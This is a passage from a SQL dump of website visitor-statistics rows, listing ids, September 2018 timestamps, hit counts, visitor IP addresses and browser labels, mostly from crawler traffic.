146109,1,1,0,0,'54.36.148.55','other'),(303203,1537146132,1,1,0,0,'54.36.148.252','other'),(303204,1537146438,1,1,0,0,'54.36.148.150','other'),(303205,1537146441,1,1,0,0,'54.36.148.79','other'),(303206,1537146474,1,1,0,0,'54.36.149.23','other'),(303207,1537146475,1,1,0,0,'54.36.149.75','other'),(303208,1537146586,1,1,0,0,'54.36.148.145','other'),(303209,1537146875,1,1,0,0,'54.36.148.197','other'),(303210,1537146978,1,1,0,0,'66.249.65.103','chrome'),(303211,1537146998,1,1,0,0,'8.29.198.27','other'),(303212,1537147010,1,1,0,0,'66.249.65.99','chrome'),(303213,1537147074,1,1,0,0,'8.29.198.25','other'),(303214,1537147137,1,1,0,0,'54.36.148.48','other'),(303215,1537147202,1,1,0,0,'54.36.148.84','other'),(303216,1537147267,1,1,0,0,'66.249.65.123','chrome'),(303217,1537147527,1,1,0,0,'178.154.244.11','other'),(303218,1537147614,1,1,0,0,'54.36.148.229','other'),(303219,1537147621,1,1,0,0,'54.36.148.208','other'),(303220,1537147870,1,1,0,0,'54.36.149.49','other'),(303221,1537147998,1,1,0,0,'54.36.148.107','other'),(303222,1537148015,1,1,0,0,'54.36.149.45','other'),(303223,1537148133,1,1,0,0,'54.36.148.45','other'),(303224,1537148202,1,1,0,0,'54.36.148.83','other'),(303225,1537148285,1,1,0,0,'54.36.148.148','other'),(303226,1537148338,1,1,0,0,'54.36.148.70','other'),(303227,1537148339,1,1,0,0,'54.36.148.149','other'),(303228,1537148350,1,1,0,0,'54.36.148.161','other'),(303229,1537148457,1,1,0,0,'54.36.148.93','other'),(303230,1537148489,1,1,0,0,'54.36.149.77','other'),(303231,1537148652,1,1,0,0,'52.37.211.217','chrome'),(303232,1537148795,1,1,0,0,'180.76.15.149','other'),(303233,1537149218,1,1,0,0,'54.36.148.10','other'),(303234,1537149343,1,1,0,0,'54.36.148.101','other'),(303235,1537149397,1,1,0,0,'52.34.24.33','chrome'),(303236,1537149628,1,1,0,0,'54.36.148.75','other'),(303237,1537149840,1,1,0,0,'54.36.149.92','other'),(303238,1537149903,1,1,0,0,'54.36.148.150','other'),(303239,1537149929,1,1,0,0,'54.36.148.163','other'),(303240,1537150146,1,1,0,0,'54.36.148.23','other'),(303241,1537150167,1,1,0,0,'54.36.148.234','other'),(303242,1537150194,1,1,0,0,'54.36.149.20','other'),(303243,1537150203,1,1,0,0,'54.36.148.227','other'),(303244,1537150276,1,1,0,0,'54.36.148.18','other'),(303245,1537150302,1,1,0,0,'54.36.149.43','other'),(303246,1537150497,1,1,0,0,'54.36.148.205','other'),(303247,1537150774,1,1,0,0,'157.55.39.190','other'),(303248,1537151041,1,1,0,0,'54.36.148.28','other'),(303249,1537151062,1,1,0,0,'54.36.148.159','other'),(303250,1537151346,1,1,0,0,'8.29.198.27','other'),(303251,1537151347,1,1,0,0,'54.36.148.158','other'),(303252,1537151438,1,1,0,0,'66.249.65.99','chrome'),(303253,1537151504,1,1,0,0,'66.249.65.105','chrome'),(303254,1537151745,1,1,0,0,'54.36.149.91','other'),(303255,1537151812,1,1,0,0,'54.36.148.215','other'),(303256,1537151834,1,1,0,0,'54.36.148.194','other'),(303257,1537151886,1,1,0,0,'216.244.66.241','other'),(303258,1537152024,1,1,0,0,'54.36.148.112','other'),(303259,1537152129,1,1,0,0,'54.36.148.229','other'),(303260,1537152150,1,1,0,0,'54.36.149.42','other'),(303261,1537152256,1,1,0,0,'66.249.65.125','chrome'),(303262,1537152337,1,1,0,0,'54.36.148.77','other'),(303263,1537152546,1,1,0,0,'54.36.148.24','other'),(303264,1537152633,1,1,0,0,'54.36.148.85','other'),(303265,1537152639,1,1,0,0,'54.36.148.109','other'),(303266,1537152810,1,1,0,0,'54.36.149.37','other'),(303267,1537153165,1,1,0,0,'54.36.148.119','other'),(303268,1537153181,1,1,0,0,'54.36.148.245','other'),(303269,1537153259,1,1,0,0,'54.36.148.194','other'),(303270,1537153262,1,1,0,0,'54.36.148.232','other'),(303271,1537153370,1,1,0,0,'54.36.148.32','other'),(303272,1537153450,1,1,0,0,'54.36.148.10','other'),(303273,1537153740,1,1,0,0,'54.36.149.54','other'),(303274,1537153824,1,1,0,0,'54.36.148.81','other'),(303275,1537154166,8,8,0,0,'195.154.173.101','firefox'),(303276,1537154359,2,2,0,0,'216.244.66.241','other'),(303277,1537154369,1,1,0,0,'54.36.148.196','other'),(303278,1537154396,1,1,0,0,'54.36.148.79','other'),(303279,1537154413,1,1,0,0,'54.36.148.250','other'),(303280,1537154464,1,1,0,0,'54.36.148.146','other'),(303281,1537154703,5,5,0,0,'54.165.59.7','other'),(303282,1537154793,2,2,0,0,'54.36.148.229','other'),(303283,1537154794,1,1,0,0,'54.36.149.52','other'),(303284,1537155661,1,1,0,0,'54.36.149.98','other'),(303285,1537155808,1,0,1,0,'66.249.65.105',''),(303286,1537155833,1,1,0,0,'54.36.148.26','other'),(303287,1537156145,1,1,0,0,'54.36.148.83','other'),(303288,1537156221,1,1,0,0,'54.36.149.44','other'),(303289,1537156588,1,1,0,0,'54.36.148.79','other'),(303290,1537156851,1,1,0,0,'54.36.148.157','other'),(303291,1537156869,1,1,0,0,'54.36.148.186','other'),(303292,1537156972,1,1,0,0,'54.36.148.40','other'),(303293,1537157476,1,1,0,0,'66.249.65.105','chrome'),(303294,1537157647,1,1,0,0,'54.36.148.149','other'),(303295,1537157808,1,1,0,0,'54.36.148.224','other'),(303296,1537157819,1,1,0,0,'8.29.198.27','other'),(303297,1537157852,1,1,0,0,'54.36.148.19','other'),(303298,1537157899,1,1,0,0,'8.29.198.25','other'),(303299,1537157929,1,1,0,0,'54.36.148.233','other'),(303300,1537158024,1,1,0,0,'54.36.149.1','other'),(303301,1537158050,1,1,0,0,'37.54.175.179','chrome'),(303302,1537158500,1,1,0,0,'54.36.148.250','other'),(303303,1537158761,1,1,0,0,'54.36.149.89','other'),(303304,1537159106,1,1,0,0,'54.36.149.7','other'),(303305,1537159173,1,1,0,0,'54.36.149.18','other'),(303306,1537159335,1,1,0,0,'66.249.65.123','chrome'),(303307,1537159455,1,1,0,0,'54.36.148.219','other'),(303308,1537159597,1,1,0,0,'54.36.148.201','other'),(303309,1537159882,2,2,0,0,'54.36.148.151','other'),(303310,1537159896,1,0,1,0,'66.249.65.105',''),(303311,1537159979,1,1,0,0,'54.36.149.67','other'),(303312,1537160272,1,1,0,0,'54.36.148.47','other'),(303313,1537160683,1,1,0,0,'54.36.148.50','other'),(303314,1537160685,1,1,0,0,'54.36.148.207','other'),(303315,1537160689,1,1,0,0,'54.36.149.93','other'),(303316,1537160904,1,1,0,0,'66.249.65.99','chrome'),(303317,1537161455,1,1,0,0,'40.77.167.107','other'),(303318,1537161546,1,1,0,0,'54.36.148.38','other'),(303319,1537161904,1,1,0,0,'66.249.65.105','chrome'),(303320,1537162179,1,1,0,0,'8.29.198.27','other'),(303321,1537162240,1,1,0,0,'54.36.149.103','other'),(303322,1537162432,1,1,0,0,'54.36.149.12','other'),(303323,1537162510,1,1,0,0,'54.36.148.176','other'),(303324,1537162512,1,1,0,0,'54.36.148.147','other'),(303325,1537162723,1,1,0,0,'54.36.148.24','other'),(303326,1537163161,1,1,0,0,'54.36.148.181','other'),(303327,1537163238,1,1,0,0,'40.77.167.107','other'),(303328,1537163254,1,1,0,0,'54.36.148.153','other'),(303329,1537163282,1,1,0,0,'54.36.148.202','other'),(303330,1537163747,4,4,0,0,'178.154.244.29','other'),(303331,1537163816,1,1,0,0,'54.36.148.150','other'),(303332,1537164007,1,1,0,0,'178.154.244.11','other'),(303333,1537164012,1,1,0,0,'54.36.149.38','other'),(303334,1537164251,1,1,0,0,'54.36.148.182','other'),(303335,1537164412,1,1,0,0,'54.36.149.52','other'),(303336,1537164537,1,1,0,0,'37.55.194.27','chrome'),(303337,1537164683,3,3,0,0,'178.154.244.29','other'),(303338,1537164703,1,1,0,0,'54.36.149.11','other'),(303339,1537164745,1,0,1,0,'66.249.65.99',''),(303340,1537164774,1,1,0,0,'95.108.213.4','other'),(303341,1537164777,1,1,0,0,'54.36.148.255','other'),(303342,1537164786,1,1,0,0,'66.249.65.123','chrome'),(303343,1537164928,8,8,0,0,'195.154.173.101','firefox'),(303344,1537164969,1,1,0,0,'91.196.178.179','chrome'),(303345,1537165077,1,1,0,0,'54.36.149.9','other'),(303346,1537165888,1,1,0,0,'54.36.148.166','other'),(303347,1537165932,1,1,0,0,'54.36.148.30','other'),(303348,1537166062,1,1,0,0,'213.179.252.5','chrome'),(303349,1537166166,1,1,0,0,'66.249.65.105','chrome'),(303350,1537166264,1,1,0,0,'54.36.149.72','other'),(303351,1537166265,2,2,0,0,'95.213.141.126','opera'),(303352,1537166368,1,1,0,0,'54.36.148.15','other'),(303353,1537166450,1,1,0,0,'54.36.148.24','other'),(303354,1537166500,1,1,0,0,'54.36.148.193','other'),(303355,1537166511,1,1,0,0,'54.36.148.114','other'),(303356,1537166822,2,2,0,0,'91.196.178.101','chrome'),(303357,1537167565,1,1,0,0,'54.36.148.77','other'),(303358,1537167579,1,1,0,0,'54.36.148.210','other'),(303359,1537167786,2,2,0,0,'216.244.66.241','other'),(303360,1537167793,1,1,0,0,'91.196.178.189','chrome'),(303361,1537167840,1,1,0,0,'54.36.148.12','other'),(303362,1537167916,1,1,0,0,'66.249.65.105','chrome'),(303363,1537167960,1,1,0,0,'54.36.148.224','other'),(303364,1537168201,1,1,0,0,'54.36.149.68','other'),(303365,1537168339,1,1,0,0,'54.36.149.97','other'),(303366,1537168348,1,1,0,0,'54.36.148.249','other'),(303367,1537168368,1,1,0,0,'54.36.149.0','other'),(303368,1537168429,1,1,0,0,'54.36.148.25','other'),(303369,1537168645,1,1,0,0,'8.29.198.26','other'),(303370,1537168682,1,1,0,0,'54.36.149.107','other'),(303371,1537168714,1,1,0,0,'8.29.198.25','other'),(303372,1537168838,1,1,0,0,'54.36.149.75','other'),(303373,1537168839,1,1,0,0,'54.36.148.47','other'),(303374,1537169171,1,1,0,0,'62.205.134.182','msie'),(303375,1537169382,1,1,0,0,'54.36.148.150','other'),(303376,1537169383,1,1,0,0,'54.36.148.170','other'),(303377,1537169444,1,0,1,0,'66.249.65.105',''),(303378,1537169532,1,1,0,0,'54.36.148.144','other'),(303379,1537169782,1,1,0,0,'37.53.136.218','chrome'),(303380,1537170262,1,1,0,0,'66.249.65.123','chrome'),(303381,1537170427,1,1,0,0,'216.244.66.241','other'),(303382,1537170436,1,1,0,0,'92.112.224.251','chrome'),(303383,1537170816,1,1,0,0,'54.36.148.66','other'),(303384,1537170920,1,1,0,0,'54.36.148.23','other'),(303385,1537171127,2,2,0,0,'173.208.130.202','other'),(303386,1537171364,1,1,0,0,'66.249.65.105','chrome'),(303387,1537171405,1,1,0,0,'54.36.148.115','other'),(303388,1537171685,1,1,0,0,'54.36.149.10','other'),(303389,1537171811,1,1,0,0,'54.36.148.241','other'),(303390,1537171964,1,1,0,0,'54.36.149.45','other'),(303391,1537171997,1,1,0,0,'54.36.148.60','other'),(303392,1537172026,1,1,0,0,'54.36.148.203','other'),(303393,1537172043,1,1,0,0,'51.255.65.46','other'),(303394,1537172071,1,1,0,0,'185.181.166.194','firefox'),(303395,1537172163,1,1,0,0,'54.36.149.26','other'),(303396,1537172299,1,1,0,0,'54.36.148.224','other'),(303397,1537172545,1,1,0,0,'54.36.148.250','other'),(303398,1537172831,1,1,0,0,'54.36.149.106','other'),(303399,1537172913,1,1,0,0,'54.36.148.39','other'),(303400,1537173025,1,1,0,0,'8.29.198.26','other'),(303401,1537173216,1,1,0,0,'216.244.66.241','other'),(303402,1537173331,1,1,0,0,'54.36.148.28','other'),(303403,1537173404,1,1,0,0,'54.36.149.1','other'),(303404,1537173483,1,1,0,0,'66.249.65.105','chrome'),(303405,1537173923,1,1,0,0,'178.154.244.29','other'),(303406,1537173926,1,1,0,0,'178.154.244.11','other'),(303407,1537174074,1,1,0,0,'37.53.197.85','chrome'),(303408,1537174192,1,1,0,0,'54.36.148.29','other'),(303409,1537174584,1,1,0,0,'54.36.148.233','other'),(303410,1537174782,1,1,0,0,'54.36.148.196','other'),(303411,1537174920,2,2,0,0,'54.36.148.33','other'),(303412,1537175047,1,1,0,0,'54.36.149.62','other'),(303413,1537175063,1,1,0,0,'157.55.39.190','other'),(303414,1537175105,1,1,0,0,'91.196.178.133','firefox'),(303415,1537175348,1,1,0,0,'54.36.149.1','other'),(303416,1537175405,1,1,0,0,'54.36.148.124','other'),(303417,1537175540,1,1,0,0,'66.249.65.121','chrome'),(303418,1537175728,1,1,0,0,'54.36.149.94','other'),(303419,1537175776,1,1,0,0,'95.163.255.105','other'),(303420,1537175835,1,1,0,0,'95.163.255.118','other'),(303421,1537175875,1,1,0,0,'54.36.149.3','other'),(303422,1537176338,1,1,0,0,'54.36.148.42','other'),(303423,1537176388,1,1,0,0,'54.36.149.51','other'),(303424,1537176594,1,1,0,0,'54.36.148.163','other'),(303425,1537176602,1,1,0,0,'54.36.149.78','other'),(303426,1537176737,1,1,0,0,'51.255.65.46','other'),(303427,1537176777,1,1,0,0,'91.124.6.56','firefox'),(303428,1537176908,1,1,0,0,'54.36.148.18','other'),(303429,1537177354,1,1,0,0,'54.36.148.120','other'),(303430,1537177477,4,4,0,0,'148.251.195.14','other'),(303431,1537177520,1,1,0,0,'54.36.148.22','other'),(303432,1537177600,1,1,0,0,'54.36.148.169','other'),(303433,1537177624,1,1,0,0,'80.252.153.33','firefox'),(303434,1537177638,1,1,0,0,'66.249.65.105','chrome'),(303435,1537177755,1,1,0,0,'54.36.148.180','other'),(303436,1537177929,1,1,0,0,'216.244.66.241','other'),(303437,1537178038,1,1,0,0,'46.219.200.9','chrome'),(303438,1537178110,1,1,0,0,'5.45.207.76','other'),(303439,1537178130,1,1,0,0,'95.108.181.75','other'),(303440,1537178295,1,1,0,0,'54.36.149.36','other'),(303441,1537178425,1,1,0,0,'54.36.148.49','other'),(303442,1537178473,1,1,0,0,'213.180.203.9','other'),(303443,1537178612,1,1,0,0,'54.36.148.87','other'),(303444,1537178687,1,1,0,0,'54.36.148.78','other'),(303445,1537178721,1,0,1,0,'66.249.65.99',''),(303446,1537179224,1,1,0,0,'54.36.148.43','other'),(303447,1537179467,2,2,0,0,'8.29.198.27','other'),(303448,1537179527,1,1,0,0,'95.163.255.105','other'),(303449,1537179675,1,1,0,0,'54.36.148.10','other'),(303450,1537179767,1,1,0,0,'141.8.142.103','other'),(303451,1537179770,1,1,0,0,'218.30.103.154','other'),(303452,1537179772,1,1,0,0,'213.180.203.17','other'),(303453,1537179905,1,1,0,0,'54.36.148.176','other'),(303454,1537180138,1,1,0,0,'54.36.148.13','other'),(303455,1537180166,1,1,0,0,'54.36.148.27','other'),(303456,1537180215,1,1,0,0,'54.36.148.124','other'),(303457,1537180524,1,1,0,0,'54.36.148.95','other'),(303458,1537180931,1,1,0,0,'54.36.149.2','other'),(303459,1537181031,1,1,0,0,'54.36.148.235','other'),(303460,1537181159,1,1,0,0,'54.36.148.92','other'),(303461,1537181263,1,1,0,0,'54.36.149.13','other'),(303462,1537181327,1,1,0,0,'5.45.207.8','other'),(303463,1537181340,1,1,0,0,'141.8.183.22','other'),(303464,1537181407,1,1,0,0,'54.36.148.157','other'),(303465,1537181567,1,1,0,0,'54.36.149.63','other'),(303466,1537181599,1,1,0,0,'54.36.148.186','other'),(303467,1537181942,1,1,0,0,'54.36.148.235','other'),(303468,1537182048,1,1,0,0,'54.36.148.215','other'),(303469,1537182175,1,1,0,0,'54.36.148.251','other'),(303470,1537182509,1,1,0,0,'54.36.148.13','other'),(303471,1537182584,1,1,0,0,'54.36.148.157','other'),(303472,1537182588,1,1,0,0,'54.36.148.244','other'),(303473,1537182727,1,1,0,0,'66.249.65.121','chrome'),(303474,1537182839,1,1,0,0,'54.36.148.201','other'),(303475,1537182900,1,1,0,0,'66.249.65.105','chrome'),(303476,1537182970,1,1,0,0,'91.196.178.171','chrome'),(303477,1537182979,1,1,0,0,'54.36.148.11','other'),(303478,1537183059,12,12,0,0,'23.237.4.26','other'),(303479,1537183389,1,1,0,0,'54.36.148.220','other'),(303480,1537183568,1,1,0,0,'54.36.148.240','other'),(303481,1537183603,1,1,0,0,'54.36.148.47','other'),(303482,1537183851,1,1,0,0,'8.29.198.26','other'),(303483,1537183866,1,0,1,0,'66.249.65.105',''),(303484,1537183903,8,8,0,0,'157.55.39.190','other'),(303485,1537183926,1,1,0,0,'54.36.149.61','other'),(303486,1537183928,16,16,0,0,'157.55.39.196','other'),(303487,1537183931,1,1,0,0,'54.36.148.164','other'),(303488,1537183948,12,12,0,0,'40.77.167.107','other'),(303489,1537184004,1,1,0,0,'54.36.148.163','other'),(303490,1537184374,1,1,0,0,'54.36.149.104','other'),(303491,1537184395,1,1,0,0,'54.36.148.107','other'),(303492,1537184506,1,1,0,0,'91.196.178.133','firefox'),(303493,1537184569,1,1,0,0,'54.36.149.9','other'),(303494,1537184619,1,1,0,0,'66.249.65.105','chrome'),(303495,1537184686,1,1,0,0,'54.36.149.70','other'),(303496,1537185070,1,1,0,0,'37.54.62.6','chrome'),(303497,1537185197,1,1,0,0,'54.36.148.80','other'),(303498,1537185215,1,1,0,0,'54.36.148.152','other'),(303499,1537185411,3,3,0,0,'91.196.177.15','chrome'),(303500,1537185498,1,1,0,0,'54.36.149.25','other'),(303501,1537185521,1,1,0,0,'52.114.75.71','other'),(303502,1537185531,1,1,0,0,'91.196.177.15','firefox'),(303503,1537185577,2,2,0,0,'178.154.244.29','other'),(303504,1537185769,1,1,0,0,'54.36.148.51','other'),(303505,1537185798,1,1,0,0,'54.36.148.198','other'),(303506,1537185848,1,1,0,0,'54.36.148.91','other'),(303507,1537185876,2,2,0,0,'178.154.244.11','other'),(303508,1537185974,1,1,0,0,'46.201.174.95','chrome'),(303509,1537185992,1,1,0,0,'54.36.149.1','other'),(303510,1537186295,1,1,0,0,'66.249.65.105','chrome'),(303511,1537186496,1,1,0,0,'54.36.148.124','other'),(303512,1537186564,1,1,0,0,'92.112.0.27','chrome'),(303513,1537186570,1,1,0,0,'54.36.149.24','other'),(303514,1537186585,3,3,0,0,'178.154.244.29','other'),(303515,1537186956,2,2,0,0,'178.154.244.11','other'),(303516,1537187085,1,1,0,0,'54.36.148.157','other'),(303517,1537187200,2,2,0,0,'91.196.178.94','chrome'),(303518,1537187273,1,1,0,0,'82.145.221.110','chrome'),(303519,1537187303,1,1,0,0,'54.36.148.152','other'),(303520,1537187364,1,1,0,0,'54.36.148.134','other'),(303521,1537187484,1,1,0,0,'78.111.190.81','chrome'),(303522,1537187562,1,1,0,0,'95.163.255.168','other'),(303523,1537187835,1,1,0,0,'54.36.148.22','other'),(303524,1537187838,1,1,0,0,'54.36.149.10','other'),(303525,1537188085,1,1,0,0,'54.36.149.70','other'),(303526,1537188245,2,2,0,0,'66.249.65.103','chrome'),(303527,1537188461,1,1,0,0,'54.36.148.249','other'),(303528,1537188533,1,1,0,0,'66.249.65.125','chrome'),(303529,1537188536,1,1,0,0,'54.36.149.89','other'),(303530,1537188589,1,1,0,0,'66.249.65.105','chrome'),(303531,1537188606,1,1,0,0,'54.36.149.82','other'),(303532,1537188899,1,1,0,0,'54.36.148.50','other'),(303533,1537188995,1,1,0,0,'54.36.148.79','other'),(303534,1537189207,1,1,0,0,'54.36.149.84','other'),(303535,1537189252,2,2,0,0,'178.154.244.29','other'),(303536,1537189266,1,1,0,0,'54.36.148.244','other'),(303537,1537189284,1,1,0,0,'176.120.99.194','chrome'),(303538,1537189293,2,2,0,0,'5.45.207.79','other'),(303539,1537189557,1,1,0,0,'54.36.148.252','other'),(303540,1537189641,1,1,0,0,'91.196.177.46','chrome'),(303541,1537189789,1,0,1,0,'66.249.65.105',''),(303542,1537189836,1,1,0,0,'54.36.148.129','other'),(303543,1537189863,1,1,0,0,'178.154.171.24','other'),(303544,1537189876,1,1,0,0,'54.36.149.32','other'),(303545,1537190068,1,1,0,0,'5.45.207.19','other'),(303546,1537190079,1,1,0,0,'54.36.148.238','other'),(303547,1537190237,1,1,0,0,'54.36.148.33','other'),(303548,1537190305,2,2,0,0,'8.29.198.27','other'),(303549,1537190454,1,1,0,0,'54.36.149.19','other'),(303550,1537190647,1,1,0,0,'54.36.148.46','other'),(303551,1537190798,1,0,1,0,'66.249.65.121',''),(303552,1537190845,1,1,0,0,'178.154.244.11','other'),(303553,1537190900,1,1,0,0,'54.36.149.74','other'),(303554,1537191002,1,1,0,0,'91.196.178.84','firefox'),(303555,1537191323,1,1,0,0,'87.250.224.47','other'),(303556,1537191370,1,1,0,0,'54.36.148.202','other'),(303557,1537191469,1,1,0,0,'54.36.148.11','other'),(303558,1537191589,1,1,0,0,'54.36.148.200','other'),(303559,1537191853,1,1,0,0,'54.36.148.87','other'),(303560,1537191983,1,1,0,0,'54.36.149.3','other'),(303561,1537192040,1,1,0,0,'54.36.148.227','other'),(303562,1537192059,1,1,0,0,'91.196.178.94','chrome'),(303563,1537192066,3,3,0,0,'178.154.244.29','other'),(303564,1537192069,1,1,0,0,'5.45.207.8','other'),(303565,1537192098,1,1,0,0,'95.108.181.57','other'),(303566,1537192103,2,2,0,0,'141.8.142.103','other'),(303567,1537192308,1,1,0,0,'54.36.148.66','other'),(303568,1537192995,2,2,0,0,'178.154.244.11','other'),(303569,1537193016,1,1,0,0,'54.36.148.231','other'),(303570,1537193022,3,3,0,0,'178.154.244.29','other'),(303571,1537193126,1,1,0,0,'66.249.65.99','chrome'),(303572,1537193284,1,1,0,0,'141.8.142.103','other'),(303573,1537193523,1,1,0,0,'91.196.178.136','chrome'),(303574,1537193564,2,2,0,0,'216.244.66.241','other'),(303575,1537193671,1,1,0,0,'66.249.65.121','chrome'),(303576,1537193782,1,1,0,0,'54.36.149.22','other'),(303577,1537193931,1,1,0,0,'178.154.244.11','other'),(303578,1537194009,1,1,0,0,'54.36.148.20','other'),(303579,1537194027,1,1,0,0,'5.45.207.79','other'),(303580,1537194046,1,1,0,0,'54.36.148.36','other'),(303581,1537194068,1,1,0,0,'54.36.148.210','other'),(303582,1537194100,1,1,0,0,'54.36.148.231','other'),(303583,1537194188,1,1,0,0,'54.36.149.75','other'),(303584,1537194332,1,1,0,0,'77.111.247.60','chrome'),(303585,1537194442,1,1,0,0,'54.36.148.248','other'),(303586,1537194527,1,1,0,0,'54.36.148.244','other'),(303587,1537194640,1,1,0,0,'54.36.148.35','other'),(303588,1537194683,1,1,0,0,'8.29.198.27','other'),(303589,1537194698,1,1,0,0,'54.36.149.12','other'),(303590,1537194699,1,1,0,0,'54.36.148.190','other'),(303591,1537194902,1,1,0,0,'54.36.148.137','other'),(303592,1537195086,1,1,0,0,'54.36.148.139','other'),(303593,1537195130,1,1,0,0,'54.36.148.11','other'),(303594,1537195194,1,1,0,0,'54.36.149.62','other'),(303595,1537195438,1,1,0,0,'37.55.225.27','chrome'),(303596,1537195711,1,1,0,0,'66.249.65.99','chrome'),(303597,1537195801,1,1,0,0,'188.230.43.254','other'),(303598,1537196073,1,1,0,0,'54.36.148.118','other'),(303599,1537196107,1,1,0,0,'216.244.66.241','other'),(303600,1537196144,1,1,0,0,'54.36.148.84','other'),(303601,1537196277,1,1,0,0,'178.154.244.29','other'),(303602,1537196284,1,1,0,0,'54.36.148.102','other'),(303603,1537196348,1,1,0,0,'5.45.207.79','other'),(303604,1537196357,1,1,0,0,'54.36.148.38','other'),(303605,1537196663,2,2,0,0,'37.55.225.27','chrome'),(303606,1537196847,1,1,0,0,'178.154.200.48','other'),(303607,1537196894,1,1,0,0,'54.36.149.76','other'),(303608,1537196909,1,1,0,0,'54.36.148.192','other'),(303609,1537196923,2,2,0,0,'93.74.95.94','chrome'),(303610,1537197361,1,1,0,0,'54.36.148.193','other'),(303611,1537197367,1,1,0,0,'54.36.149.27','other'),(303612,1537197543,1,1,0,0,'54.36.149.58','other'),(303613,1537197575,1,1,0,0,'178.154.244.11','other'),(303614,1537197954,1,1,0,0,'54.36.148.150','other'),(303615,1537197978,1,1,0,0,'216.244.66.241','other'),(303616,1537198090,1,0,1,0,'66.249.65.105',''),(303617,1537198124,1,1,0,0,'54.36.148.196','other'),(303618,1537198200,1,1,0,0,'188.230.43.254','other'),(303619,1537198277,1,1,0,0,'54.36.148.167','other'),(303620,1537198299,1,1,0,0,'54.36.148.63','other'),(303621,1537198511,1,1,0,0,'66.249.65.99','chrome'),(303622,1537198691,1,1,0,0,'54.36.148.124','other'),(303623,1537198807,1,1,0,0,'54.36.149.50','other'),(303624,1537198929,1,1,0,0,'54.36.148.107','other'),(303625,1537199248,1,1,0,0,'54.36.149.103','other'),(303626,1537199622,1,1,0,0,'54.36.148.117','other'),(303627,1537199657,1,1,0,0,'54.36.148.136','other'),(303628,1537199773,1,1,0,0,'54.36.148.238','other'),(303629,1537199821,1,1,0,0,'54.36.148.135','other'),(303630,1537199852,1,1,0,0,'54.36.149.82','other'),(303631,1537199980,1,1,0,0,'54.36.148.168','other'),(303632,1537200248,1,1,0,0,'54.36.149.16','other'),(303633,1537200266,2,2,0,0,'54.165.59.7','other'),(303634,1537200596,1,1,0,0,'188.230.43.254','other'),(303635,1537200898,1,1,0,0,'54.36.149.25','other'),(303636,1537200913,1,1,0,0,'54.36.148.16','other'),(303637,1537200967,1,1,0,0,'216.244.66.241','other'),(303638,1537201006,1,1,0,0,'66.249.65.121','chrome'),(303639,1537201140,1,1,0,0,'8.29.198.27','other'),(303640,1537201162,2,2,0,0,'91.196.178.169','chrome'),(303641,1537201183,1,1,0,0,'54.165.59.7','other'),(303642,1537201193,1,1,0,0,'8.29.198.25','other'),(303643,1537201363,1,1,0,0,'54.36.149.60','other'),(303644,1537201425,1,1,0,0,'54.36.149.91','other'),(303645,1537201426,1,1,0,0,'54.36.148.107','other'),(303646,1537202087,1,1,0,0,'180.76.15.153','other'),(303647,1537202172,2,2,0,0,'54.165.59.7','other'),(303648,1537202191,1,1,0,0,'54.36.148.21','other'),(303649,1537202228,1,1,0,0,'54.36.148.96','other'),(303650,1537202245,1,1,0,0,'54.36.148.240','other'),(303651,1537202303,1,1,0,0,'66.249.65.105','chrome'),(303652,1537202513,1,1,0,0,'91.196.178.75','firefox'),(303653,1537202788,1,1,0,0,'54.36.148.81','other'),(303654,1537202879,1,1,0,0,'54.36.148.73','other'),(303655,1537202889,2,1,1,0,'66.249.65.103',''),(303656,1537202957,2,2,0,0,'54.36.148.46','other'),(303657,1537203000,1,1,0,0,'54.36.148.175','other'),(303658,1537203013,1,1,0,0,'54.36.148.254','other'),(303659,1537203605,2,2,0,0,'54.36.149.2','other'),(303660,1537203924,5,5,0,0,'95.216.11.179','other'),(303661,1537203956,1,1,0,0,'54.36.148.241','other'),(303662,1537203964,2,2,0,0,'216.244.66.241','other'),(303663,1537204249,1,1,0,0,'54.36.148.129','other'),(303664,1537204258,1,1,0,0,'54.36.148.94','other'),(303665,1537204307,1,1,0,0,'146.185.156.139','chrome'),(303666,1537204561,1,1,0,0,'54.36.149.67','other'),(303667,1537204573,1,1,0,0,'40.77.167.107','other'),(303668,1537204608,2,2,0,0,'178.154.244.29','other'),(303669,1537204627,1,1,0,0,'54.165.59.7','other'),(303670,1537204826,1,1,0,0,'54.36.148.16','other'),(303671,1537205040,4,4,0,0,'5.9.140.242','other'),(303672,1537205412,1,1,0,0,'54.36.149.12','other'),(303673,1537205519,1,1,0,0,'8.29.198.25','other'),(303674,1537205527,1,1,0,0,'157.55.39.196','other'),(303675,1537205696,1,1,0,0,'54.36.148.189','other'),(303676,1537205721,1,1,0,0,'54.36.148.145','other'),(303677,1537205769,1,1,0,0,'54.36.148.187','other'),(303678,1537205821,1,1,0,0,'66.249.65.99','chrome'),(303679,1537206067,1,1,0,0,'54.36.148.69','other'),(303680,1537206073,1,1,0,0,'54.36.148.133','other'),(303681,1537206087,1,1,0,0,'180.76.15.27','other'),(303682,1537206094,1,1,0,0,'66.249.65.105','chrome'),(303683,1537206246,1,1,0,0,'54.36.148.227','other'),(303684,1537206251,1,1,0,0,'54.36.148.32','other'),(303685,1537206313,1,1,0,0,'54.36.148.207','other'),(303686,1537206562,1,1,0,0,'40.77.167.107','other'),(303687,1537206568,4,4,0,0,'157.55.39.190','other'),(303688,1537206681,1,1,0,0,'66.249.65.125','chrome'),(303689,1537206780,1,1,0,0,'54.36.148.124','other'),(303690,1537206887,1,0,1,0,'66.249.65.99',''),(303691,1537207258,1,1,0,0,'54.36.149.103','other'),(303692,1537207324,1,1,0,0,'54.36.148.173','other'),(303693,1537207411,1,1,0,0,'54.36.148.139','other'),(303694,1537207885,1,1,0,0,'54.36.149.100','other'),(303695,1537207933,1,1,0,0,'54.36.148.149','other'),(303696,1537207946,1,1,0,0,'91.196.178.74','chrome'),(303697,1537208125,1,1,0,0,'54.165.59.7','other'),(303698,1537208241,1,1,0,0,'54.36.148.195','other'),(303699,1537208946,1,1,0,0,'54.36.149.87','other'),(303700,1537208999,1,1,0,0,'54.36.148.121','other'),(303701,1537209196,1,1,0,0,'54.36.148.211','other'),(303702,1537209221,1,1,0,0,'54.36.148.43','other'),(303703,1537209386,1,1,0,0,'54.36.148.132','other'),(303704,1537209481,1,1,0,0,'54.36.148.228','other'),(303705,1537209828,1,1,0,0,'54.36.148.118','other'),(303706,1537209944,1,1,0,0,'54.36.148.231','other'),(303707,1537209966,1,1,0,0,'54.36.148.99','other'),(303708,1537210268,1,1,0,0,'54.36.148.91','other'),(303709,1537210344,1,1,0,0,'54.36.148.55','other'),(303710,1537210627,1,1,0,0,'54.36.148.100','other'),(303711,1537210734,1,1,0,0,'54.36.149.104','other'),(303712,1537210757,1,1,0,0,'54.36.149.97','other'),(303713,1537210969,1,1,0,0,'54.36.149.79','other'),(303714,1537210975,1,1,0,0,